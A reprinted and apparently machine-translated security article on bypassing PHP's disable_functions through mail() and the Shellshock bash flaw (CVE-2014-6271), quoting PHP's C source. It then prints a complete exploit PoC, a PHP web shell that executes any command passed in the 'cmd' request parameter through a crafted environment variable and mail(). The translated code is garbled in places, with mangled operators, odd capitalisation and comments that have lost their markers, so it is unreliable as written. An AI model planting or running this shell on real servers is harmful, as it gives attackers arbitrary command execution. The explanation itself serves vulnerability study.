PHP Execute Command Bypass disable_functions

Let's start with the process of calling the mail () function in PHP.
See Source Ext/mail.c

236 lines:
char *sendmail_path = INI_STR("sendmail_path"); 
char *sendmail_cmd = NULL;

Get the Sendmail_path variable from the INI. Let's see what php.ini is saying:

; For Unix only.  You may supply arguments as well (default: "sendmail -t -i"). 
;sendmail_path =

As you can see in the note, the default value for Send_mail is "sendmail-t-i".

Extra_cmd (Some additional parameters passed in by the user) exist, call spprintf to combine Sendmail_path and extra_cmd into a truly executed command-line Sendmail_cmd. Does not exist, it assigns the Sendmail_path directly to the sendmail_cmd.
As follows:
if (!sendmail_path) {
#if (defined Php_win32 | | defined NETWARE)
/* Handle old style win SMTP sending */
if (Tsendmail (Ini_str ("SMTP"), &tsm_err, &tsm_errmsg, HDR, subject, to, message, NULL, NULL, NULL tsrmls_cc) = = FA Ilure) {
if (tsm_errmsg) {
Php_error_docref (NULL tsrmls_cc, e_warning, "%s", tsm_errmsg);
Efree (TSM_ERRMSG);
} else {
Php_error_docref (NULL tsrmls_cc, e_warning, "%s", Getsmerrortext (Tsm_err));
}
Mail_ret (0);
}
Mail_ret (1);
#else
Mail_ret (0);
#endif
}
if (extra_cmd! = NULL) {
spprintf (&sendmail_cmd, 0, "%s%s", Sendmail_path, Extra_cmd);
} else {
Sendmail_cmd = Sendmail_path;
}

After execution:

#ifdef PHP_WIN32 
  sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC); 
#else 
  /* Since popen() doesn‘t indicate if the internal fork() doesn‘t work 
   * (e.g. the shell can‘t be executed) we explicitly set it to 0 to be 
   * sure we don‘t catch any older errno value. */ 
  errno = 0; 
  sendmail = popen(sendmail_cmd, "w"); 
#endif

Throw the sendmail_cmd to Popen execution.
If the system default SH is Bash,popen it will be thrown to bash execution.

The previous bash Shell (cve-2014-6271) vulnerability directly caused us to use the mail () function to execute arbitrary commands, bypassing disable_functions.

Impact Version: PHP versions

FIX: Fix cve-2014-6271

The POC (http://www.exploit-db.com/exploits/35146/) is given as follows:

<?php
# Exploit title:php 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork:none
# date:10/31/2014
# Exploit Author:ryan King (Starfall)
# Vendor Homepage:http://php.net
# software Link:http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# version:5.* (Tested on 5.6.2)
# tested On:debian 7 and CentOS 5 and 6
# cve:cve-2014-6271

function Shellshock ($cmd) {//Execute a command via cve-2014-6271 @mail. c:283
$tmp = Tempnam (".", "data");
Putenv ("php_lol= () {x;}; $cmd > $tmp 2>&1 ");
In Safe Mode, the user could only alter environment variableswhose names
Begin with the prefixes supplied by this directive.
By default, users would only be able to set environment Variablesthat
Begin with php_ (e.g. Php_foo=bar). Note:if this directive IsEmpty,
PHP would let the user modify any environment variable!
Mail ("[email protected]", "", "", "", "-BV"); -BV so we don ' t actuallysend any mail
$output = @file_get_contents ($tmp);
@unlink ($TMP);
if ($output! = "") return $output;
else return "No output, or not vuln.";
}
Echo Shellshock ($_request["cmd"]);
?>

"Article Source: http://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html author phith0n"

Reprint Please specify: Security pulse»php Execute Command Bypass disable_functions

PHP Execute Command Bypass disable_functions